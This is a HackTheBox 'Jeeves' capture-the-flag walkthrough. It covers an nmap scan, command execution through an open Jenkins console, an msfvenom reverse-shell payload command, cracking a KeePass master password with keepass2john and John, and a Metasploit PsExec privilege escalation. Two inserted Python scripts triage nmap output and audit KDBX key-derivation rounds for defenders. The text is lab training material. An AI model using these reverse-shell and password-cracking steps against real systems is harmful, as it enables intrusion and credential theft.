Jeeves — HackTheBox Walkthrough

There will be no fancy pictures, only the raw meat:

Initial nmap scan (all ports, default scripts, version enumeration):
root@kali:~# nmap -sT --min-rate 5000 --max-retries 1 -p- -sC -sV

Starting Nmap 7.60 ( ) at 2018-04-03 17:40 EDT
Nmap scan report for
Host is up (0.061s latency).
Not shown: 65531 filtered ports
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 19h01m59s, deviation: 0s, median: 19h01m59s
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-04-04 12:43:05
|_ start_date: 2018-04-01 22:48:58
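The scan above already contains the findings that matter for this box: a TRACE-enabled IIS, SMB with signing disabled (SMB1) or not required (SMB2), and a Jetty-served application on a non-standard port that turns out to be an unauthenticated Jenkins. As an added example (not part of the original write-up), the script below parses nmap's normal output and pulls out exactly those items, so a reviewer can triage a large scan without reading every script block. The sample text is constructed to mirror the scan on this page (placeholder IP); attributing the host-level SMB script results to 445/tcp is an assumption made by the triage rules.

```python
import re

# Constructed sample in the shape of nmap normal output, mirroring the walkthrough's scan.
# The target address is a placeholder, not a real host.
SAMPLE_NMAP = """\
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-03 17:40 EDT
Nmap scan report for 10.0.0.1
Host is up (0.061s latency).
Not shown: 65531 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# "80/tcp open http Microsoft IIS httpd 10.0" -> port, state, service, version banner
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\w+)\s+(\S+)\s+(.*)$")


def parse_nmap(text):
    """Split normal-format nmap output into per-port records plus host script lines."""
    ports, host_scripts = {}, []
    current, in_host_scripts = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results:"):
            in_host_scripts, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host_scripts:
            port, state, service, version = m.groups()
            current = port
            ports[port] = {"state": state, "service": service, "version": version, "scripts": []}
            continue
        if line.startswith("|"):
            # NSE script lines are prefixed with "| " / "|_" plus indentation
            body = line.lstrip("|_ ").strip()
            if in_host_scripts:
                host_scripts.append(body)
            elif current:
                ports[current]["scripts"].append(body)
    return ports, host_scripts


def triage(text):
    """Return (port, issue) pairs for the weaknesses a reviewer should look at first."""
    ports, host_scripts = parse_nmap(text)
    findings = []
    for port, info in ports.items():
        if info["state"] != "open":
            continue
        for s in info["scripts"]:
            if s.startswith("Potentially risky methods:") and "TRACE" in s:
                findings.append((port, "HTTP TRACE method enabled"))
        if "Jetty" in info["version"]:
            # Jetty commonly fronts CI consoles such as Jenkins; the fix is authentication, not obscurity
            findings.append((port, "Jetty-served web application; verify it requires authentication"))
    # Assumption: host-level SMB script output describes the 445/tcp service
    for s in host_scripts:
        if s.startswith("message_signing:") and "disabled" in s:
            findings.append(("445/tcp", "SMB1 message signing disabled"))
        if s == "Message signing enabled but not required":
            findings.append(("445/tcp", "SMB2 message signing not required"))
    return findings


if __name__ == "__main__":
    for port, issue in triage(SAMPLE_NMAP):
        print(f"{port:10} {issue}")
```

The parser keeps every NSE line per port, so new rules (for example, flagging the guest account used for SMB enumeration) are one extra `if` in `triage` rather than a change to the parser.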

It appears that the server is running a Jenkins console on port 50000, so let's create a new Jenkins task to view user.txt:

Jenkins -> New Item -> Freestyle Project -> Ok
and configure the build now:
Add Build Step button → Execute Windows batch command → 

and finally click on Build Now, then check Console Output:

We can see that commands are executed as the kohsuke user, so let's try to read the user.txt flag as that user:

Click on Build and we get the flag :)

Let's now generate an msfvenom payload and upload it to the machine:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > reverse.exe

On the Metasploit side, you know what to do... and we get a shell!

For the privilege escalation part, I found a KeePassX file under

Let's extract a crackable hash of the KeePass master key from the database:
# keepass2john CEH.kdbx
# keepass2john CEH.kdbx > CEH-CrackMe

Crack the KeePassX master password using John the Ripper:
# john CEH-CrackMe --wordlist=/usr/share/wordlists/rockyou.txt --fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
mo(*****) (CEH)

Open the KeePassX file with our password.
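The master password fell to rockyou, and the other half of that risk is how expensive each guess is: keepass2john only works because the key-derivation cost is stored in the clear in the file header. As an added example (not part of the write-up, and run on a constructed header rather than a real database), the parser below reads the KDBX 3.1 header fields that set that cost and flags a low AES-KDF round count so a defender can audit databases before they are copied around. The minimum-rounds threshold is an assumed local policy, not a KeePass setting; for KDBX 4 the KDF parameters live in a variant dictionary, which is reported but not parsed here.

```python
import struct

# KDBX file signature (two little-endian uint32s) and the header field IDs used below
KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
HDR_END, HDR_TRANSFORM_ROUNDS, HDR_KDF_PARAMS = 0, 6, 11


def build_kdbx3_header(transform_rounds):
    """Constructed KDBX 3.1 header for the example: real layout, placeholder field contents."""
    fields = [
        (2, bytes(16)),                              # CipherID (placeholder UUID)
        (3, struct.pack("<I", 1)),                   # CompressionFlags: gzip
        (4, bytes(32)),                              # MasterSeed (placeholder)
        (5, bytes(32)),                              # TransformSeed (placeholder)
        (6, struct.pack("<Q", transform_rounds)),    # TransformRounds: the AES-KDF cost
        (7, bytes(16)),                              # EncryptionIV (placeholder)
        (HDR_END, b"\r\n\r\n"),                      # EndOfHeader
    ]
    out = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)   # version: minor 1, major 3
    for fid, data in fields:
        out += struct.pack("<BH", fid, len(data)) + data     # KDBX3: uint16 field length
    return out


def read_kdbx_kdf(data):
    """Parse the outer header and return format version plus the key-derivation cost."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file")
    info = {"version": f"{major}.{minor}", "transform_rounds": None, "kdf": None}
    pos = 12
    while pos < len(data):
        fid = data[pos]
        if major >= 4:
            (length,) = struct.unpack_from("<I", data, pos + 1)   # KDBX4: uint32 length
            pos += 5
        else:
            (length,) = struct.unpack_from("<H", data, pos + 1)   # KDBX3: uint16 length
            pos += 3
        payload = data[pos:pos + length]
        pos += length
        if fid == HDR_END:
            break
        if fid == HDR_TRANSFORM_ROUNDS:
            info["transform_rounds"] = struct.unpack("<Q", payload)[0]
            info["kdf"] = "AES-KDF"
        elif fid == HDR_KDF_PARAMS:
            info["kdf"] = "KDBX4 variant dictionary (AES-KDF or Argon2; not parsed here)"
    return info


def assess(info, min_rounds=1_000_000):
    """Policy check. The threshold is an assumed local policy, not a KeePass default."""
    rounds = info["transform_rounds"]
    if rounds is None:
        return "unknown"          # KDBX4 or truncated header: cost is stored elsewhere
    return "weak" if rounds < min_rounds else "ok"


if __name__ == "__main__":
    for rounds in (6000, 2_000_000):
        info = read_kdbx_kdf(build_kdbx3_header(rounds))
        print(info["version"], info["kdf"], info["transform_rounds"], assess(info))
```

Reading the header needs no password, which is the same property the cracking step relies on; the round count only slows each guess down, so it complements a master password that is not in a public wordlist rather than replacing it.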

Use the PsExec module in Metasploit:

Get root.txt.